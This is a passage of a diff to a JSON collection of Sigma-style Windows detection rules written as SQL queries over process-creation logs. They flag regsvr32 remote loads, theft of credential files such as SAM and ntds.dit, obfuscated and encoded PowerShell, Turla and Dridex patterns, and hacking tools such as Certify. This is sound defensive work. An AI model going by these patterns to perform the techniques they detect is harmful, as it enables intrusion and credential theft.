ESCAPE '\\' OR CommandLine LIKE '%set-itemproperty%' ESCAPE '\\' OR CommandLine LIKE '% sp %' ESCAPE '\\' OR CommandLine LIKE '%new-itemproperty%' ESCAPE '\\')) AND (IntegrityLevel = 'Medium' AND CommandLine LIKE '%ControlSet%' ESCAPE '\\' AND CommandLine LIKE '%Services%' ESCAPE '\\' AND 
(CommandLine LIKE '%ImagePath%' ESCAPE '\\' OR CommandLine LIKE '%FailureCommand%' ESCAPE '\\' OR CommandLine LIKE '%ServiceDLL%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\System32\\\\control.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE')) AND NOT (CommandLine LIKE '%Shell32.dll%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_non_priv_reg_or_ps.yml" + "filename": "proc_creation_win_rundll32_susp_control_dll_load.yml" }, { - "title": "Suspicious Regsvr32 HTTP IP Pattern", - "id": "2dd2c217-bf68-437a-b57c-fe9fd01d5de8", + "title": "Delete Important Scheduled Task", + "id": "dbc1f800-0fe0-4bc0-9c66-292c2abe3f78", "status": "experimental", - "description": "Detects a certain command line flag combination used by regsvr32 when used to download and register a DLL from a remote address which uses HTTP (not HTTPS) and a IP address and not FQDN", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects when adversaries stop services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.010" + "attack.impact", + "attack.t1489" ], "falsepositives": [ - "FQDNs that start with a number" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% /s%' ESCAPE '\\' AND CommandLine LIKE '% /u%' ESCAPE '\\' AND (CommandLine LIKE '% /i:http://1%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://2%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://3%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://4%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://5%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://6%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://7%' ESCAPE '\\' OR CommandLine LIKE '% 
/i:http://8%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://9%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://1%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://2%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://3%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://4%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://5%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://6%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://7%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://8%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://9%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/delete%' ESCAPE '\\' AND CommandLine LIKE '%/tn%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_regsvr32_http_pattern.yml" + "filename": "proc_creation_win_schtasks_delete.yml" }, { - "title": "Potential Unquoted Service Path Reconnaissance Via Wmic.EXE", - "id": "68bcd73b-37ef-49cb-95fc-edc809730be6", - "status": "experimental", - "description": "Detects known WMI recon method to look for unquoted service paths using wmic. 
Often used by pentester and attacker enumeration scripts", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Turla Group Commands May 2020", + "id": "9e2e51c5-c699-4794-ba5a-29f5da40ac0c", + "status": "test", + "description": "Detects commands used by Turla group as reported by ESET in May 2020", + "author": "Florian Roth (Nextron Systems)", "tags": [ + "attack.g0010", "attack.execution", - "attack.t1047" + "attack.t1059.001", + "attack.t1053.005", + "attack.t1027" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'wmic.exe' OR NewProcessName LIKE '%\\\\WMIC.exe' ESCAPE '\\') AND (CommandLine LIKE '% service get %' ESCAPE '\\' AND CommandLine LIKE '%name,displayname,pathname,startmode%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%tracert -h 10 yahoo.com%' ESCAPE '\\' OR CommandLine LIKE '%.WSqmCons))|iex;%' ESCAPE '\\' OR CommandLine LIKE '%Fr`omBa`se6`4Str`ing%' ESCAPE '\\') OR (CommandLine LIKE '%net use https://docs.live.net%' ESCAPE '\\' AND CommandLine LIKE '%@aol.co.uk%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wmic_recon_unquoted_service_search.yml" + "filename": "proc_creation_win_apt_turla_comrat_may20.yml" }, { - "title": "Sysmon Driver Unloaded Via Fltmc.EXE", - "id": "4d7cda18-1b12-4e52-b45c-d28653210df8", - "status": "test", - "description": "Detects possible Sysmon filter driver unloaded via fltmc.exe", - "author": "Kirill Kiryanov, oscd.community", + "title": "Rundll32 UNC Path Execution", + "id": "5cdb711b-5740-4fb2-ba88-f7945027afac", + "status": "experimental", + "description": "Detects rundll32 execution where the DLL is located on a remote location (share)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1070", - "attack.t1562", - "attack.t1562.002" + 
"attack.execution", + "attack.t1021.002", + "attack.t1218.011" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\fltMC.exe' ESCAPE '\\' OR OriginalFileName = 'fltMC.exe') AND (CommandLine LIKE '%unload%' ESCAPE '\\' AND CommandLine LIKE '%sysmon%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE' OR CommandLine LIKE '%rundll32%' ESCAPE '\\') AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\')" ], - "filename": "proc_creation_win_fltmc_unload_driver_sysmon.yml" + "filename": "proc_creation_win_rundll32_unc_path.yml" }, { - "title": "Regsvr32 Flags Anomaly", - "id": "b236190c-1c61-41e9-84b3-3fe03f6d76b0", + "title": "Copying Sensitive Files with Credential Data", + "id": "e7be6119-fc37-43f0-ad4f-1f3f99be2f9f", "status": "test", - "description": "Detects a flag anomaly in which regsvr32.exe uses a /i flag without using a /n flag at the same time", - "author": "Florian Roth (Nextron Systems)", + "description": "Files with well-known filenames (sensitive files with credential data) copying", + "author": "Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1218.010" + "attack.credential_access", + "attack.t1003.002", + "attack.t1003.003", + "car.2013-07-001", + "attack.s0404" ], "falsepositives": [ - "Unknown" + "Copying sensitive files for legitimate use (eg. 
backup) or forensic investigation by legitimate incident responder or forensic invetigator" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '% /i:%' ESCAPE '\\') AND NOT (CommandLine LIKE '% /n %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\esentutl.exe' ESCAPE '\\') AND (CommandLine LIKE '%vss%' ESCAPE '\\' OR CommandLine LIKE '% /m %' ESCAPE '\\' OR CommandLine LIKE '% /y %' ESCAPE '\\')) OR (CommandLine LIKE '%\\\\windows\\\\ntds\\\\ntds.dit%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\security%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\system %' ESCAPE '\\' OR CommandLine LIKE '%\\\\repair\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\repair\\\\system%' ESCAPE '\\' OR CommandLine LIKE '%\\\\repair\\\\security%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\RegBack\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\RegBack\\\\system%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\RegBack\\\\security%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_regsvr32_flags_anomaly.yml" + "filename": "proc_creation_win_esentutl_sensitive_file_copy.yml" }, { - "title": "Suspicious PowerShell Parameter Substring", - "id": "36210e0d-5b19-485d-a087-c096088885f0", - "status": "test", - "description": "Detects suspicious PowerShell invocation with a parameter substring", - "author": "Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix)", + "title": "Renamed PsExec Service Execution", + "id": "51ae86a2-e2e1-4097-ad85-c46cb6851de4", + "status": "experimental", + "description": "Detects suspicious launch of a renamed version of the PSEXESVC service with, which is not often used by legitimate administrators", + 
"author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Legitimate administrative tasks" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '% -windowstyle h %' ESCAPE '\\' OR CommandLine LIKE '% -windowstyl h%' ESCAPE '\\' OR CommandLine LIKE '% -windowsty h%' ESCAPE '\\' OR CommandLine LIKE '% -windowst h%' ESCAPE '\\' OR CommandLine LIKE '% -windows h%' ESCAPE '\\' OR CommandLine LIKE '% -windo h%' ESCAPE '\\' OR CommandLine LIKE '% -wind h%' ESCAPE '\\' OR CommandLine LIKE '% -win h%' ESCAPE '\\' OR CommandLine LIKE '% -wi h%' ESCAPE '\\' OR CommandLine LIKE '% -win h %' ESCAPE '\\' OR CommandLine LIKE '% -win hi %' ESCAPE '\\' OR CommandLine LIKE '% -win hid %' ESCAPE '\\' OR CommandLine LIKE '% -win hidd %' ESCAPE '\\' OR CommandLine LIKE '% -win hidde %' ESCAPE '\\' OR CommandLine LIKE '% -NoPr %' ESCAPE '\\' OR CommandLine LIKE '% -NoPro %' ESCAPE '\\' OR CommandLine LIKE '% -NoProf %' ESCAPE '\\' OR CommandLine LIKE '% -NoProfi %' ESCAPE '\\' OR CommandLine LIKE '% -NoProfil %' ESCAPE '\\' OR CommandLine LIKE '% -nonin %' ESCAPE '\\' OR CommandLine LIKE '% -nonint %' ESCAPE '\\' OR CommandLine LIKE '% -noninte %' ESCAPE '\\' OR CommandLine LIKE '% -noninter %' ESCAPE '\\' OR CommandLine LIKE '% -nonintera %' ESCAPE '\\' OR CommandLine LIKE '% -noninterac %' ESCAPE '\\' OR CommandLine LIKE '% -noninteract %' ESCAPE '\\' OR CommandLine LIKE '% -noninteracti %' ESCAPE '\\' OR CommandLine LIKE '% -noninteractiv %' ESCAPE '\\' OR CommandLine LIKE '% -ec %' ESCAPE '\\' OR CommandLine LIKE '% -encodedComman %' ESCAPE '\\' OR CommandLine LIKE '% -encodedComma %' ESCAPE '\\' OR CommandLine LIKE '% -encodedComm %' ESCAPE '\\' OR CommandLine LIKE '% -encodedCom %' ESCAPE '\\' OR 
CommandLine LIKE '% -encodedCo %' ESCAPE '\\' OR CommandLine LIKE '% -encodedC %' ESCAPE '\\' OR CommandLine LIKE '% -encoded %' ESCAPE '\\' OR CommandLine LIKE '% -encode %' ESCAPE '\\' OR CommandLine LIKE '% -encod %' ESCAPE '\\' OR CommandLine LIKE '% -enco %' ESCAPE '\\' OR CommandLine LIKE '% -en %' ESCAPE '\\' OR CommandLine LIKE '% -executionpolic %' ESCAPE '\\' OR CommandLine LIKE '% -executionpoli %' ESCAPE '\\' OR CommandLine LIKE '% -executionpol %' ESCAPE '\\' OR CommandLine LIKE '% -executionpo %' ESCAPE '\\' OR CommandLine LIKE '% -executionp %' ESCAPE '\\' OR CommandLine LIKE '% -execution bypass%' ESCAPE '\\' OR CommandLine LIKE '% -executio bypass%' ESCAPE '\\' OR CommandLine LIKE '% -executi bypass%' ESCAPE '\\' OR CommandLine LIKE '% -execut bypass%' ESCAPE '\\' OR CommandLine LIKE '% -execu bypass%' ESCAPE '\\' OR CommandLine LIKE '% -exec bypass%' ESCAPE '\\' OR CommandLine LIKE '% -exe bypass%' ESCAPE '\\' OR CommandLine LIKE '% -ex bypass%' ESCAPE '\\' OR CommandLine LIKE '% -ep bypass%' ESCAPE '\\' OR CommandLine LIKE '% /windowstyle h %' ESCAPE '\\' OR CommandLine LIKE '% /windowstyl h%' ESCAPE '\\' OR CommandLine LIKE '% /windowsty h%' ESCAPE '\\' OR CommandLine LIKE '% /windowst h%' ESCAPE '\\' OR CommandLine LIKE '% /windows h%' ESCAPE '\\' OR CommandLine LIKE '% /windo h%' ESCAPE '\\' OR CommandLine LIKE '% /wind h%' ESCAPE '\\' OR CommandLine LIKE '% /win h%' ESCAPE '\\' OR CommandLine LIKE '% /wi h%' ESCAPE '\\' OR CommandLine LIKE '% /win h %' ESCAPE '\\' OR CommandLine LIKE '% /win hi %' ESCAPE '\\' OR CommandLine LIKE '% /win hid %' ESCAPE '\\' OR CommandLine LIKE '% /win hidd %' ESCAPE '\\' OR CommandLine LIKE '% /win hidde %' ESCAPE '\\' OR CommandLine LIKE '% /NoPr %' ESCAPE '\\' OR CommandLine LIKE '% /NoPro %' ESCAPE '\\' OR CommandLine LIKE '% /NoProf %' ESCAPE '\\' OR CommandLine LIKE '% /NoProfi %' ESCAPE '\\' OR CommandLine LIKE '% /NoProfil %' ESCAPE '\\' OR CommandLine LIKE '% /nonin %' ESCAPE '\\' OR CommandLine LIKE '% 
/nonint %' ESCAPE '\\' OR CommandLine LIKE '% /noninte %' ESCAPE '\\' OR CommandLine LIKE '% /noninter %' ESCAPE '\\' OR CommandLine LIKE '% /nonintera %' ESCAPE '\\' OR CommandLine LIKE '% /noninterac %' ESCAPE '\\' OR CommandLine LIKE '% /noninteract %' ESCAPE '\\' OR CommandLine LIKE '% /noninteracti %' ESCAPE '\\' OR CommandLine LIKE '% /noninteractiv %' ESCAPE '\\' OR CommandLine LIKE '% /ec %' ESCAPE '\\' OR CommandLine LIKE '% /encodedComman %' ESCAPE '\\' OR CommandLine LIKE '% /encodedComma %' ESCAPE '\\' OR CommandLine LIKE '% /encodedComm %' ESCAPE '\\' OR CommandLine LIKE '% /encodedCom %' ESCAPE '\\' OR CommandLine LIKE '% /encodedCo %' ESCAPE '\\' OR CommandLine LIKE '% /encodedC %' ESCAPE '\\' OR CommandLine LIKE '% /encoded %' ESCAPE '\\' OR CommandLine LIKE '% /encode %' ESCAPE '\\' OR CommandLine LIKE '% /encod %' ESCAPE '\\' OR CommandLine LIKE '% /enco %' ESCAPE '\\' OR CommandLine LIKE '% /en %' ESCAPE '\\' OR CommandLine LIKE '% /executionpolic %' ESCAPE '\\' OR CommandLine LIKE '% /executionpoli %' ESCAPE '\\' OR CommandLine LIKE '% /executionpol %' ESCAPE '\\' OR CommandLine LIKE '% /executionpo %' ESCAPE '\\' OR CommandLine LIKE '% /executionp %' ESCAPE '\\' OR CommandLine LIKE '% /execution bypass%' ESCAPE '\\' OR CommandLine LIKE '% /executio bypass%' ESCAPE '\\' OR CommandLine LIKE '% /executi bypass%' ESCAPE '\\' OR CommandLine LIKE '% /execut bypass%' ESCAPE '\\' OR CommandLine LIKE '% /execu bypass%' ESCAPE '\\' OR CommandLine LIKE '% /exec bypass%' ESCAPE '\\' OR CommandLine LIKE '% /exe bypass%' ESCAPE '\\' OR CommandLine LIKE '% /ex bypass%' ESCAPE '\\' OR CommandLine LIKE '% /ep bypass%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'psexesvc.exe' AND NOT (NewProcessName LIKE 'C:\\\\Windows\\\\PSEXESVC.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_susp_parameter_variation.yml" + "filename": 
"proc_creation_win_renamed_sysinternals_psexec_service.yml" }, { - "title": "Suspicious File Download via CertOC.exe", - "id": "70ad0861-d1fe-491c-a45f-fa48148a300d", - "status": "experimental", - "description": "Detects when a user downloads file by using CertOC.exe", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential Dridex Activity", + "id": "e6eb5a96-9e6f-4a18-9cdd-642cfda21c8e", + "status": "stable", + "description": "Detects potential Dridex acitvity via specific process patterns", + "author": "Florian Roth (Nextron Systems), oscd.community, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055", + "attack.discovery", + "attack.t1135", + "attack.t1033" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certoc.exe' ESCAPE '\\' OR OriginalFileName = 'CertOC.exe') AND CommandLine LIKE '%-GetCACAPS%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((((NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\') AND NOT (ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\')) OR ((ParentProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (CommandLine LIKE '% -s %' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\')) AND NOT (CommandLine LIKE '%.dll%' ESCAPE '\\'))) OR (ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' AND CommandLine LIKE '% /all%' ESCAPE '\\') OR ((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') AND 
CommandLine LIKE '% view%' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_lolbin_certoc_download.yml" + "filename": "proc_creation_win_malware_dridex.yml" }, { - "title": "Suspicious Schtasks From Env Var Folder", - "id": "81325ce1-be01-4250-944f-b4789644556f", - "status": "experimental", - "description": "Detects Schtask creations that point to a suspicious folder or an environment variable often used by malware", - "author": "Florian Roth (Nextron Systems)", + "title": "RDP Connection Allowed Via Netsh.EXE", + "id": "01aeb693-138d-49d2-9403-c4f52d7d3d62", + "status": "test", + "description": "Detects usage of the netsh command to open and allow connections to port 3389 (RDP). As seen used by Sarwent Malware", + "author": "Sander Wiebing", "tags": [ - "attack.execution", - "attack.t1053.005" + "attack.defense_evasion", + "attack.t1562.004" ], "falsepositives": [ - "Benign scheduled tasks creations or executions that happen often during software installations", - "Software that uses the AppData folder and scheduled tasks to update the software in the AppData folders" + "Legitimate administration activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /create %' ESCAPE '\\' AND (CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs%' ESCAPE '\\')) OR (ParentCommandLine LIKE '%\\\\svchost.exe -k netsvcs -p -s Schedule' ESCAPE '\\' AND (CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE 
'%C:\\\\Perflogs%' ESCAPE '\\'))) AND NOT (((CommandLine LIKE '%update\\_task.xml%' ESCAPE '\\' OR CommandLine LIKE '%/Create /TN TVInstallRestore /TR%' ESCAPE '\\') OR ParentCommandLine LIKE '%unattended.ini%' ESCAPE '\\') OR (CommandLine LIKE '%/Create /Xml \"C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\.CR.%' ESCAPE '\\' AND CommandLine LIKE '%Avira\\_Security\\_Installation.xml%' ESCAPE '\\') OR (CommandLine LIKE '%/Create /F /TN%' ESCAPE '\\' AND CommandLine LIKE '%/Xml %' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\is-%' ESCAPE '\\' AND CommandLine LIKE '%Avira\\_%' ESCAPE '\\' AND (CommandLine LIKE '%.tmp\\\\UpdateFallbackTask.xml%' ESCAPE '\\' OR CommandLine LIKE '%.tmp\\\\WatchdogServiceControlManagerTimeout.xml%' ESCAPE '\\' OR CommandLine LIKE '%.tmp\\\\SystrayAutostart.xml%' ESCAPE '\\' OR CommandLine LIKE '%.tmp\\\\MaintenanceTask.xml%' ESCAPE '\\')) OR (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%/Create /TN \"klcp\\_update\" /XML %' ESCAPE '\\' AND CommandLine LIKE '%\\\\klcp\\_update\\_task.xml%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '%firewall %' ESCAPE '\\' AND CommandLine LIKE '%add %' ESCAPE '\\' AND CommandLine LIKE '%tcp %' ESCAPE '\\' AND CommandLine LIKE '%3389%' ESCAPE '\\') AND (CommandLine LIKE '%portopening%' ESCAPE '\\' OR (CommandLine LIKE '%advfirewall%' ESCAPE '\\' AND CommandLine LIKE '%rule%' ESCAPE '\\' AND CommandLine LIKE '%allow%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_schtasks_env_folder.yml" + "filename": "proc_creation_win_netsh_fw_allow_rdp.yml" }, { - "title": "Suspicious Reconnaissance Activity Via GatherNetworkInfo.VBS", - "id": "07aa184a-870d-413d-893a-157f317f6f58", + "title": "PowerShell Base64 Encoded Invoke Keyword", + "id": 
"6385697e-9f1b-40bd-8817-f4a91f40508e", "status": "test", - "description": "Detects execution of the built-in script located in \"C:\\Windows\\System32\\gatherNetworkInfo.vbs\". Which can be used to gather information about the target machine", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects UTF-8 and UTF-16 Base64 encoded powershell 'Invoke-' calls", + "author": "pH-T (Nextron Systems), Harjot Singh, @cyb3rjy0t", "tags": [ - "attack.discovery", "attack.execution", - "attack.t1615", - "attack.t1059.005" + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND CommandLine LIKE '%gatherNetworkInfo.vbs%' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '% -e%' ESCAPE '\\' AND (CommandLine LIKE '%SQBuAHYAbwBrAGUALQ%' ESCAPE '\\' OR CommandLine LIKE '%kAbgB2AG8AawBlAC0A%' ESCAPE '\\' OR CommandLine LIKE '%JAG4AdgBvAGsAZQAtA%' ESCAPE '\\' OR CommandLine LIKE '%SW52b2tlL%' ESCAPE '\\' OR CommandLine LIKE '%ludm9rZS%' ESCAPE '\\' OR CommandLine LIKE '%JbnZva2Ut%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_gather_network_info_execution.yml" + "filename": "proc_creation_win_powershell_base64_invoke.yml" }, { - "title": "Suspicious RazerInstaller Explorer Subprocess", - "id": "a4eaf250-7dc1-4842-862a-5e71cd59a167", - "status": "test", - "description": "Detects a explorer.exe sub process of the RazerInstaller software which can be invoked from the installer to select a different installation folder but can also be exploited to escalate privileges 
to LOCAL SYSTEM", - "author": "Florian Roth (Nextron Systems), Maxime Thiebaut", + "title": "Suspect Svchost Activity", + "id": "16c37b52-b141-42a5-a3ea-bbe098444397", + "status": "experimental", + "description": "It is extremely abnormal for svchost.exe to spawn without any CLI arguments and is normally observed when a malicious process spawns the process and injects code into the process memory space.", + "author": "David Burkett, @signalblur", "tags": [ + "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1553" + "attack.t1055" ], "falsepositives": [ - "User selecting a different installation folder (check for other sub processes of this explorer.exe process)" + "Rpcnet.exe / rpcnetp.exe which is a lojack style software. https://www.blackhat.com/docs/us-14/materials/us-14-Kamlyuk-Kamluk-Computrace-Backdoor-Revisited.pdf" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\RazerInstaller.exe' ESCAPE '\\' AND IntegrityLevel = 'System') AND NOT (NewProcessName LIKE 'C:\\\\Windows\\\\Installer\\\\Razer\\\\Installer\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%svchost.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\') AND NOT ((ParentProcessName LIKE '%\\\\rpcnet.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\rpcnetp.exe' ESCAPE '\\') OR CommandLine = ''))" ], - "filename": "proc_creation_win_exploit_other_razorinstaller_lpe.yml" + "filename": "proc_creation_win_svchost_execution_with_no_cli_flags.yml" }, { - "title": "Potential Meterpreter/CobaltStrike Activity", - "id": "15619216-e993-4721-b590-4c520615a67d", - "status": "test", - "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service starting", - "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", + "title": "HackTool - Certify Execution", + "id": 
"762f2482-ff21-4970-8939-0aa317a886bb", + "status": "experimental", + "description": "Detects Certify a tool for Active Directory certificate abuse based on PE metadata characteristics and common command line arguments.", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1134.001", - "attack.t1134.002" + "attack.discovery", + "attack.credential_access", + "attack.t1649" ], "falsepositives": [ - "Commandlines containing components like cmd accidentally", - "Jobs and services started with cmd" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\' AND ((CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%echo%' ESCAPE '\\' AND CommandLine LIKE '%\\\\pipe\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%cmd%' ESCAPE '\\' OR CommandLine LIKE '%\\%COMSPEC\\%%' ESCAPE '\\')) OR (CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%.dll,a%' ESCAPE '\\' AND CommandLine LIKE '%/p:%' ESCAPE '\\'))) AND NOT ((CommandLine LIKE '%MpCmdRun%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\Certify.exe' ESCAPE '\\' OR OriginalFileName = 'Certify.exe' OR Description LIKE '%Certify%' ESCAPE '\\') OR ((CommandLine LIKE '%.exe cas %' ESCAPE '\\' OR CommandLine LIKE '%.exe find %' ESCAPE '\\' OR CommandLine LIKE '%.exe pkiobjects %' ESCAPE '\\' OR CommandLine LIKE '%.exe request %' ESCAPE '\\' OR CommandLine LIKE '%.exe download %' ESCAPE '\\') AND (CommandLine LIKE '% /vulnerable%' ESCAPE '\\' OR CommandLine LIKE '% /template:%' ESCAPE '\\' OR CommandLine LIKE '% /altname:%' ESCAPE '\\' OR 